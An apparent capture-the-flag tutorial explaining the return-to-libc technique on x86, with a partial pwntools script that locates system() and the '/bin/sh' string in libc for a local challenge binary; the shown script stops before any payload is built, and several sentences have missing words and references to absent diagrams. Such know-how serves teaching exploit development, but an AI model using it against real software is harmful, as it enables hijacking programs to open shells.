Ret2libc, short for "return-to-libc," is a type of attack that allows an attacker to execute arbitrary code in a program by redirecting the program's execution flow to a function in the libc shared library.
How it works ?
The main idea is to make a simulate a valid call to the system() function by arranging the stack correctly so that the system() function launches a shell.
The execution of this technique may vary depending on the instruction set architecture and the calling convention used. In this article, the x86 standard calling convention will be used as an example.
As explained , A validsystem() call will push the address of the parameter onto the stack followed by the return address ( saved EIP ) :
When a function ends and calls the RET instruction, it is actually a POP EIP that is performed, followed by a JMP EIP. The POP EIP takes the value that is on top of the stack and stores it in the EIP register. Since this value is controled (using a or for example), the JMP EIP is controled.
So, there is the stack state after a buffer overflow in order to return to the system function with a valid call :
Using pwntools, it's easy to retrieve theses addresses till the libc version and base address are known :
from pwn import *
# Load the binary file and start the process
elf = context.binary = ELF('./chall')
p = process()
# Load the libc library and set its base address
libc = elf.libc
libc.address = 0xf7dc2000
# Get the address of the system function in the libc library
system = libc.sym['system']
# Search for the '/bin/sh' string in the libc library and get its address
binsh = next(libc.search(b'/bin/sh'))
